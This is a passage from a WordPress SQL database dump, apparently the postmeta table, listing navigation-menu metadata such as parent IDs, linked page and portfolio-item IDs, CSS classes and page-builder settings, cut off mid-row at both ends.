:0:{}}'),(35237,3459,'_menu_item_icon','null'),(35238,3460,'_menu_item_type','post_type'),(35239,3460,'_menu_item_menu_item_parent','3401'),(35240,3460,'_menu_item_object_id','3041'),(35241,3460,'_menu_item_object','page'),(35242,3460,'_menu_item_target',''),(35243,3460,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35244,3460,'_menu_item_xfn',''),(35245,3460,'_menu_item_url',''),(35246,3460,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35247,3460,'_menu_item_icon','null'),(35248,3461,'_menu_item_type','post_type'),(35249,3461,'_menu_item_menu_item_parent','3421'),(35250,3461,'_menu_item_object_id','3044'),(35251,3461,'_menu_item_object','page'),(35252,3461,'_menu_item_target',''),(35253,3461,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35254,3461,'_menu_item_xfn',''),(35255,3461,'_menu_item_url',''),(35256,3461,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35257,3461,'_menu_item_icon','null'),(35258,3462,'_menu_item_type','post_type'),(35259,3462,'_menu_item_menu_item_parent','3414'),(35260,3462,'_menu_item_object_id','3044'),(35261,3462,'_menu_item_object','page'),(35262,3462,'_menu_item_target',''),(35263,3462,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35264,3462,'_menu_item_xfn',''),(35265,3462,'_menu_item_url',''),(35266,3462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35267,3463,'_menu_item_type','post_type'),(35268,3463,'_menu_item_menu_item_parent','3418'),(35269,3463,'_menu_item_object_id','3044'),(35270,3463,'_menu_item_object','page'),(35271,3463,'_menu_item_target',''),(35272,3463,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35273,3463,'_menu_item_xfn',''),(35274,3463,'_menu_item_url',''),(35275,3463,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35276,3463,'_menu_item_icon','null'),(35277,3464,'_menu_item_type','post_type'),(35278,3464,'_menu_item_menu_item_parent','3396'),(35279,3464,'_menu_item_object_id','3043'),(35280,3464,'_menu_item_object','page'),(35281,3464,'_menu_item_target',''),(35282,3464,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35283,3464,'_menu_item_xfn',''),(35284,3464,'_menu_item_url',''),(35285,3464,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35286,3464,'_menu_item_icon','null'),(35287,3465,'_menu_item_type','post_type'),(35288,3465,'_menu_item_menu_item_parent','3402'),(35289,3465,'_menu_item_object_id','3043'),(35290,3465,'_menu_item_object','page'),(35291,3465,'_menu_item_target',''),(35292,3465,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35293,3465,'_menu_item_xfn',''),(35294,3465,'_menu_item_url',''),(35295,3465,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35296,3465,'_menu_item_icon','null'),(35297,3466,'_menu_item_type','post_type'),(35298,3466,'_menu_item_menu_item_parent','3420'),(35299,3466,'_menu_item_object_id','3047'),(35300,3466,'_menu_item_object','page'),(35301,3466,'_menu_item_target',''),(35302,3466,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35303,3466,'_menu_item_xfn',''),(35304,3466,'_menu_item_url',''),(35305,3466,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35306,3466,'_menu_item_icon','null'),(35307,3467,'_menu_item_type','post_type'),(35308,3467,'_menu_item_menu_item_parent','3420'),(35309,3467,'_menu_item_object_id','3046'),(35310,3467,'_menu_item_object','page'),(35311,3467,'_menu_item_target',''),(35312,3467,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35313,3467,'_menu_item_xfn',''),(35314,3467,'_menu_item_url',''),(35315,3467,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35316,3467,'_menu_item_icon','null'),(35317,3468,'_menu_item_type','post_type'),(35318,3468,'_menu_item_menu_item_parent','3420'),(35319,3468,'_menu_item_object_id','3045'),(35320,3468,'_menu_item_object','page'),(35321,3468,'_menu_item_target',''),(35322,3468,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35323,3468,'_menu_item_xfn',''),(35324,3468,'_menu_item_url',''),(35325,3468,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35326,3468,'_menu_item_icon','null'),(35327,3469,'_menu_item_type','post_type'),(35328,3469,'_menu_item_menu_item_parent','3414'),(35329,3469,'_menu_item_object_id','3045'),(35330,3469,'_menu_item_object','page'),(35331,3469,'_menu_item_target',''),(35332,3469,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35333,3469,'_menu_item_xfn',''),(35334,3469,'_menu_item_url',''),(35335,3469,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35336,3470,'_menu_item_type','post_type'),(35337,3470,'_menu_item_menu_item_parent','3417'),(35338,3470,'_menu_item_object_id','3047'),(35339,3470,'_menu_item_object','page'),(35340,3470,'_menu_item_target',''),(35341,3470,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35342,3470,'_menu_item_xfn',''),(35343,3470,'_menu_item_url',''),(35344,3470,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35345,3470,'_menu_item_icon','null'),(35346,3471,'_menu_item_type','post_type'),(35347,3471,'_menu_item_menu_item_parent','3417'),(35348,3471,'_menu_item_object_id','3046'),(35349,3471,'_menu_item_object','page'),(35350,3471,'_menu_item_target',''),(35351,3471,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35352,3471,'_menu_item_xfn',''),(35353,3471,'_menu_item_url',''),(35354,3471,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35355,3471,'_menu_item_icon','null'),(35356,3472,'_menu_item_type','post_type'),(35357,3472,'_menu_item_menu_item_parent','3417'),(35358,3472,'_menu_item_object_id','3045'),(35359,3472,'_menu_item_object','page'),(35360,3472,'_menu_item_target',''),(35361,3472,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35362,3472,'_menu_item_xfn',''),(35363,3472,'_menu_item_url',''),(35364,3472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35365,3472,'_menu_item_icon','null'),(35366,3473,'_menu_item_type','post_type'),(35367,3473,'_menu_item_menu_item_parent','3402'),(35368,3473,'_menu_item_object_id','3048'),(35369,3473,'_menu_item_object','page'),(35370,3473,'_menu_item_target',''),(35371,3473,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35372,3473,'_menu_item_xfn',''),(35373,3473,'_menu_item_url',''),(35374,3473,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35375,3473,'_menu_item_icon','null'),(35376,3474,'_menu_item_type','post_type'),(35377,3474,'_menu_item_menu_item_parent','3402'),(35378,3474,'_menu_item_object_id','3051'),(35379,3474,'_menu_item_object','page'),(35380,3474,'_menu_item_target',''),(35381,3474,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35382,3474,'_menu_item_xfn',''),(35383,3474,'_menu_item_url',''),(35384,3474,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35385,3474,'_menu_item_icon','null'),(35386,3475,'_menu_item_type','post_type'),(35387,3475,'_menu_item_menu_item_parent','3402'),(35388,3475,'_menu_item_object_id','3050'),(35389,3475,'_menu_item_object','page'),(35390,3475,'_menu_item_target',''),(35391,3475,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35392,3475,'_menu_item_xfn',''),(35393,3475,'_menu_item_url',''),(35394,3475,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35395,3475,'_menu_item_icon','null'),(35396,3476,'_menu_item_type','post_type'),(35397,3476,'_menu_item_menu_item_parent','3402'),(35398,3476,'_menu_item_object_id','3049'),(35399,3476,'_menu_item_object','page'),(35400,3476,'_menu_item_target',''),(35401,3476,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35402,3476,'_menu_item_xfn',''),(35403,3476,'_menu_item_url',''),(35404,3476,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35405,3476,'_menu_item_icon','null'),(35406,3477,'_menu_item_type','post_type'),(35407,3477,'_menu_item_menu_item_parent','3401'),(35408,3477,'_menu_item_object_id','3040'),(35409,3477,'_menu_item_object','page'),(35410,3477,'_menu_item_target',''),(35411,3477,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35412,3477,'_menu_item_xfn',''),(35413,3477,'_menu_item_url',''),(35414,3477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35415,3477,'_menu_item_icon','null'),(35416,3478,'_menu_item_type','post_type'),(35417,3478,'_menu_item_menu_item_parent','3412'),(35418,3478,'_menu_item_object_id','3042'),(35419,3478,'_menu_item_object','page'),(35420,3478,'_menu_item_target',''),(35421,3478,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35422,3478,'_menu_item_xfn',''),(35423,3478,'_menu_item_url',''),(35424,3478,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35425,3479,'_menu_item_type','post_type'),(35426,3479,'_menu_item_menu_item_parent','3412'),(35427,3479,'_menu_item_object_id','3040'),(35428,3479,'_menu_item_object','page'),(35429,3479,'_menu_item_target',''),(35430,3479,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35431,3479,'_menu_item_xfn',''),(35432,3479,'_menu_item_url',''),(35433,3479,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35434,3480,'_menu_item_type','post_type'),(35435,3480,'_menu_item_menu_item_parent','3407'),(35436,3480,'_menu_item_object_id','3040'),(35437,3480,'_menu_item_object','page'),(35438,3480,'_menu_item_target',''),(35439,3480,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35440,3480,'_menu_item_xfn',''),(35441,3480,'_menu_item_url',''),(35442,3480,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35443,3481,'_menu_item_type','post_type'),(35444,3481,'_menu_item_menu_item_parent','3402'),(35445,3481,'_menu_item_object_id','3052'),(35446,3481,'_menu_item_object','page'),(35447,3481,'_menu_item_target',''),(35448,3481,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35449,3481,'_menu_item_xfn',''),(35450,3481,'_menu_item_url',''),(35451,3481,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35452,3481,'_menu_item_icon','null'),(35453,3482,'_menu_item_type','post_type'),(35454,3482,'_menu_item_menu_item_parent','3395'),(35455,3482,'_menu_item_object_id','3053'),(35456,3482,'_menu_item_object','page'),(35457,3482,'_menu_item_target',''),(35458,3482,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35459,3482,'_menu_item_xfn',''),(35460,3482,'_menu_item_url',''),(35461,3482,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35462,3482,'_menu_item_icon','null'),(35463,3483,'_menu_item_type','post_type'),(35464,3483,'_menu_item_menu_item_parent','3401'),(35465,3483,'_menu_item_object_id','3053'),(35466,3483,'_menu_item_object','page'),(35467,3483,'_menu_item_target',''),(35468,3483,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35469,3483,'_menu_item_xfn',''),(35470,3483,'_menu_item_url',''),(35471,3483,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35472,3483,'_menu_item_icon','null'),(35473,3484,'_menu_item_type','post_type'),(35474,3484,'_menu_item_menu_item_parent','3412'),(35475,3484,'_menu_item_object_id','3053'),(35476,3484,'_menu_item_object','page'),(35477,3484,'_menu_item_target',''),(35478,3484,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35479,3484,'_menu_item_xfn',''),(35480,3484,'_menu_item_url',''),(35481,3484,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35482,3485,'_menu_item_type','post_type'),(35483,3485,'_menu_item_menu_item_parent','3395'),(35484,3485,'_menu_item_object_id','3055'),(35485,3485,'_menu_item_object','page'),(35486,3485,'_menu_item_target',''),(35487,3485,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35488,3485,'_menu_item_xfn',''),(35489,3485,'_menu_item_url',''),(35490,3485,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35491,3485,'_menu_item_icon','null'),(35492,3486,'_menu_item_type','post_type'),(35493,3486,'_menu_item_menu_item_parent','3401'),(35494,3486,'_menu_item_object_id','3055'),(35495,3486,'_menu_item_object','page'),(35496,3486,'_menu_item_target',''),(35497,3486,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35498,3486,'_menu_item_xfn',''),(35499,3486,'_menu_item_url',''),(35500,3486,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35501,3486,'_menu_item_icon','null'),(35502,3487,'_menu_item_type','post_type'),(35503,3487,'_menu_item_menu_item_parent','3401'),(35504,3487,'_menu_item_object_id','3441'),(35505,3487,'_menu_item_object','page'),(35506,3487,'_menu_item_target',''),(35507,3487,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35508,3487,'_menu_item_xfn',''),(35509,3487,'_menu_item_url',''),(35510,3487,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35511,3487,'_menu_item_icon','null'),(35512,3488,'_menu_item_type','post_type'),(35513,3488,'_menu_item_menu_item_parent','3395'),(35514,3488,'_menu_item_object_id','3441'),(35515,3488,'_menu_item_object','page'),(35516,3488,'_menu_item_target',''),(35517,3488,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35518,3488,'_menu_item_xfn',''),(35519,3488,'_menu_item_url',''),(35520,3488,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35521,3488,'_menu_item_icon','null'),(35522,3489,'_menu_item_type','post_type'),(35523,3489,'_menu_item_menu_item_parent','3402'),(35524,3489,'_menu_item_object_id','3054'),(35525,3489,'_menu_item_object','page'),(35526,3489,'_menu_item_target',''),(35527,3489,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35528,3489,'_menu_item_xfn',''),(35529,3489,'_menu_item_url',''),(35530,3489,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35531,3489,'_menu_item_icon','null'),(35532,3490,'_menu_item_type','post_type'),(35533,3490,'_menu_item_menu_item_parent','3402'),(35534,3490,'_menu_item_object_id','3057'),(35535,3490,'_menu_item_object','page'),(35536,3490,'_menu_item_target',''),(35537,3490,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35538,3490,'_menu_item_xfn',''),(35539,3490,'_menu_item_url',''),(35540,3490,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35541,3490,'_menu_item_icon','null'),(35542,3491,'_menu_item_type','post_type'),(35543,3491,'_menu_item_menu_item_parent','3402'),(35544,3491,'_menu_item_object_id','3058'),(35545,3491,'_menu_item_object','page'),(35546,3491,'_menu_item_target',''),(35547,3491,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35548,3491,'_menu_item_xfn',''),(35549,3491,'_menu_item_url',''),(35550,3491,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35551,3491,'_menu_item_icon','null'),(35552,3492,'_menu_item_type','post_type'),(35553,3492,'_menu_item_menu_item_parent','3402'),(35554,3492,'_menu_item_object_id','3059'),(35555,3492,'_menu_item_object','page'),(35556,3492,'_menu_item_target',''),(35557,3492,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35558,3492,'_menu_item_xfn',''),(35559,3492,'_menu_item_url',''),(35560,3492,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35561,3492,'_menu_item_icon','null'),(35562,3493,'_menu_item_type','post_type'),(35563,3493,'_menu_item_menu_item_parent','3401'),(35564,3493,'_menu_item_object_id','3060'),(35565,3493,'_menu_item_object','page'),(35566,3493,'_menu_item_target',''),(35567,3493,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35568,3493,'_menu_item_xfn',''),(35569,3493,'_menu_item_url',''),(35570,3493,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35571,3493,'_menu_item_icon','null'),(35572,3494,'_menu_item_type','post_type'),(35573,3494,'_menu_item_menu_item_parent','3395'),(35574,3494,'_menu_item_object_id','3060'),(35575,3494,'_menu_item_object','page'),(35576,3494,'_menu_item_target',''),(35577,3494,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35578,3494,'_menu_item_xfn',''),(35579,3494,'_menu_item_url',''),(35580,3494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35581,3494,'_menu_item_icon','null'),(35582,3495,'_menu_item_type','post_type'),(35583,3495,'_menu_item_menu_item_parent','3407'),(35584,3495,'_menu_item_object_id','3060'),(35585,3495,'_menu_item_object','page'),(35586,3495,'_menu_item_target',''),(35587,3495,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35588,3495,'_menu_item_xfn',''),(35589,3495,'_menu_item_url',''),(35590,3495,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35591,3496,'_menu_item_type','post_type'),(35592,3496,'_menu_item_menu_item_parent','3436'),(35593,3496,'_menu_item_object_id','3067'),(35594,3496,'_menu_item_object','page'),(35595,3496,'_menu_item_target',''),(35596,3496,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35597,3496,'_menu_item_xfn',''),(35598,3496,'_menu_item_url',''),(35599,3496,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35600,3496,'_menu_item_icon','null'),(35601,3497,'_menu_item_type','post_type'),(35602,3497,'_menu_item_menu_item_parent','3436'),(35603,3497,'_menu_item_object_id','3066'),(35604,3497,'_menu_item_object','page'),(35605,3497,'_menu_item_target',''),(35606,3497,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35607,3497,'_menu_item_xfn',''),(35608,3497,'_menu_item_url',''),(35609,3497,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35610,3497,'_menu_item_icon','null'),(35611,3498,'_menu_item_type','post_type'),(35612,3498,'_menu_item_menu_item_parent','3436'),(35613,3498,'_menu_item_object_id','3065'),(35614,3498,'_menu_item_object','page'),(35615,3498,'_menu_item_target',''),(35616,3498,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35617,3498,'_menu_item_xfn',''),(35618,3498,'_menu_item_url',''),(35619,3498,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35620,3498,'_menu_item_icon','null'),(35621,3499,'_menu_item_type','post_type'),(35622,3499,'_menu_item_menu_item_parent','3432'),(35623,3499,'_menu_item_object_id','3077'),(35624,3499,'_menu_item_object','portfolio-item'),(35625,3499,'_menu_item_target',''),(35626,3499,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35627,3499,'_menu_item_xfn',''),(35628,3499,'_menu_item_url',''),(35629,3499,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35630,3499,'_menu_item_icon','null'),(35631,3500,'_menu_item_type','post_type'),(35632,3500,'_menu_item_menu_item_parent','3432'),(35633,3500,'_menu_item_object_id','3076'),(35634,3500,'_menu_item_object','portfolio-item'),(35635,3500,'_menu_item_target',''),(35636,3500,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35637,3500,'_menu_item_xfn',''),(35638,3500,'_menu_item_url',''),(35639,3500,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35640,3500,'_menu_item_icon','null'),(35641,3501,'_menu_item_type','post_type'),(35642,3501,'_menu_item_menu_item_parent','3432'),(35643,3501,'_menu_item_object_id','3075'),(35644,3501,'_menu_item_object','portfolio-item'),(35645,3501,'_menu_item_target',''),(35646,3501,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35647,3501,'_menu_item_xfn',''),(35648,3501,'_menu_item_url',''),(35649,3501,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35650,3501,'_menu_item_icon','null'),(35651,3502,'_menu_item_type','post_type'),(35652,3502,'_menu_item_menu_item_parent','3432'),(35653,3502,'_menu_item_object_id','3098'),(35654,3502,'_menu_item_object','portfolio-item'),(35655,3502,'_menu_item_target',''),(35656,3502,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35657,3502,'_menu_item_xfn',''),(35658,3502,'_menu_item_url',''),(35659,3502,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35660,3502,'_menu_item_icon','null'),(35661,3503,'_menu_item_type','post_type'),(35662,3503,'_menu_item_menu_item_parent','3401'),(35663,3503,'_menu_item_object_id','3068'),(35664,3503,'_menu_item_object','page'),(35665,3503,'_menu_item_target',''),(35666,3503,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35667,3503,'_menu_item_xfn',''),(35668,3503,'_menu_item_url',''),(35669,3503,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35670,3503,'_menu_item_icon','null'),(35671,3504,'_menu_item_type','post_type'),(35672,3504,'_menu_item_menu_item_parent','3395'),(35673,3504,'_menu_item_object_id','3068'),(35674,3504,'_menu_item_object','page'),(35675,3504,'_menu_item_target',''),(35676,3504,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35677,3504,'_menu_item_xfn',''),(35678,3504,'_menu_item_url',''),(35679,3504,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35680,3504,'_menu_item_icon','null'),(35681,3505,'_menu_item_type','post_type'),(35682,3505,'_menu_item_menu_item_parent','3424'),(35683,3505,'_menu_item_object_id','3071'),(35684,3505,'_menu_item_object','page'),(35685,3505,'_menu_item_target',''),(35686,3505,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35687,3505,'_menu_item_xfn',''),(35688,3505,'_menu_item_url',''),(35689,3505,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35690,3505,'_menu_item_icon','null'),(35691,3506,'_menu_item_type','post_type'),(35692,3506,'_menu_item_menu_item_parent','3427'),(35693,3506,'_menu_item_object_id','3070'),(35694,3506,'_menu_item_object','page'),(35695,3506,'_menu_item_target',''),(35696,3506,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35697,3506,'_menu_item_xfn',''),(35698,3506,'_menu_item_url',''),(35699,3506,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35700,3506,'_menu_item_icon','null'),(35701,3507,'_menu_item_type','post_type'),(35702,3507,'_menu_item_menu_item_parent','3427'),(35703,3507,'_menu_item_object_id','3069'),(35704,3507,'_menu_item_object','page'),(35705,3507,'_menu_item_target',''),(35706,3507,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35707,3507,'_menu_item_xfn',''),(35708,3507,'_menu_item_url',''),(35709,3507,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35710,3507,'_menu_item_icon','null'),(35711,3508,'_menu_item_type','post_type'),(35712,3508,'_menu_item_menu_item_parent','3428'),(35713,3508,'_menu_item_object_id','3071'),(35714,3508,'_menu_item_object','page'),(35715,3508,'_menu_item_target',''),(35716,3508,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35717,3508,'_menu_item_xfn',''),(35718,3508,'_menu_item_url',''),(35719,3508,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35720,3508,'_menu_item_icon','null'),(35721,3509,'_menu_item_type','post_type'),(35722,3509,'_menu_item_menu_item_parent','3431'),(35723,3509,'_menu_item_object_id','3070'),(35724,3509,'_menu_item_object','page'),(35725,3509,'_menu_item_target',''),(35726,3509,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35727,3509,'_menu_item_xfn',''),(35728,3509,'_menu_item_url',''),(35729,3509,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35730,3509,'_menu_item_icon','null'),(35731,3510,'_menu_item_type','post_type'),(35732,3510,'_menu_item_menu_item_parent','3431'),(35733,3510,'_menu_item_object_id','3069'),(35734,3510,'_menu_item_object','page'),(35735,3510,'_menu_item_target',''),(35736,3510,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35737,3510,'_menu_item_xfn',''),(35738,3510,'_menu_item_url',''),(35739,3510,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35740,3510,'_menu_item_icon','null'),(35741,3511,'_menu_item_type','post_type'),(35742,3511,'_menu_item_menu_item_parent','3428'),(35743,3511,'_menu_item_object_id','3072'),(35744,3511,'_menu_item_object','page'),(35745,3511,'_menu_item_target',''),(35746,3511,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35747,3511,'_menu_item_xfn',''),(35748,3511,'_menu_item_url',''),(35749,3511,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35750,3511,'_menu_item_icon','null'),(35751,3512,'_menu_item_type','post_type'),(35752,3512,'_menu_item_menu_item_parent','3424'),(35753,3512,'_menu_item_object_id','3072'),(35754,3512,'_menu_item_object','page'),(35755,3512,'_menu_item_target',''),(35756,3512,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35757,3512,'_menu_item_xfn',''),(35758,3512,'_menu_item_url',''),(35759,3512,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35760,3512,'_menu_item_icon','null'),(35761,3513,'_menu_item_type','post_type'),(35762,3513,'_menu_item_menu_item_parent','3424'),(35763,3513,'_menu_item_object_id','1382'),(35764,3513,'_menu_item_object','page'),(35765,3513,'_menu_item_target',''),(35766,3513,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35767,3513,'_menu_item_xfn',''),(35768,3513,'_menu_item_url',''),(35769,3513,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35770,3513,'_menu_item_icon','null'),(35771,3514,'_menu_item_type','post_type'),(35772,3514,'_menu_item_menu_item_parent','3428'),(35773,3514,'_menu_item_object_id','1382'),(35774,3514,'_menu_item_object','page'),(35775,3514,'_menu_item_target',''),(35776,3514,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35777,3514,'_menu_item_xfn',''),(35778,3514,'_menu_item_url',''),(35779,3514,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35780,3514,'_menu_item_icon','null'),(35781,3515,'_menu_item_type','post_type'),(35782,3515,'_menu_item_menu_item_parent','3430'),(35783,3515,'_menu_item_object_id','1393'),(35784,3515,'_menu_item_object','page'),(35785,3515,'_menu_item_target',''),(35786,3515,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35787,3515,'_menu_item_xfn',''),(35788,3515,'_menu_item_url',''),(35789,3515,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35790,3515,'_menu_item_icon','null'),(35791,3516,'_menu_item_type','post_type'),(35792,3516,'_menu_item_menu_item_parent','3429'),(35793,3516,'_menu_item_object_id','1650'),(35794,3516,'_menu_item_object','page'),(35795,3516,'_menu_item_target',''),(35796,3516,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35797,3516,'_menu_item_xfn',''),(35798,3516,'_menu_item_url',''),(35799,3516,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35800,3516,'_menu_item_icon','null'),(35801,3517,'_menu_item_type','post_type'),(35802,3517,'_menu_item_menu_item_parent','3430'),(35803,3517,'_menu_item_object_id','1642'),(35804,3517,'_menu_item_object','page'),(35805,3517,'_menu_item_target',''),(35806,3517,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35807,3517,'_menu_item_xfn',''),(35808,3517,'_menu_item_url',''),(35809,3517,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35810,3517,'_menu_item_icon','null'),(35811,3518,'_menu_item_type','post_type'),(35812,3518,'_menu_item_menu_item_parent','3425'),(35813,3518,'_menu_item_object_id','1650'),(35814,3518,'_menu_item_object','page'),(35815,3518,'_menu_item_target',''),(35816,3518,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35817,3518,'_menu_item_xfn',''),(35818,3518,'_menu_item_url',''),(35819,3518,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35820,3518,'_menu_item_icon','null'),(35821,3519,'_menu_item_type','post_type'),(35822,3519,'_menu_item_menu_item_parent','3426'),(35823,3519,'_menu_item_object_id','1642'),(35824,3519,'_menu_item_object','page'),(35825,3519,'_menu_item_target',''),(35826,3519,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35827,3519,'_menu_item_xfn',''),(35828,3519,'_menu_item_url',''),(35829,3519,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35830,3519,'_menu_item_icon','null'),(35831,3520,'_menu_item_type','post_type'),(35832,3520,'_menu_item_menu_item_parent','3426'),(35833,3520,'_menu_item_object_id','1393'),(35834,3520,'_menu_item_object','page'),(35835,3520,'_menu_item_target',''),(35836,3520,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35837,3520,'_menu_item_xfn',''),(35838,3520,'_menu_item_url',''),(35839,3520,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35840,3520,'_menu_item_icon','null'),(35841,3521,'_menu_item_type','post_type'),(35842,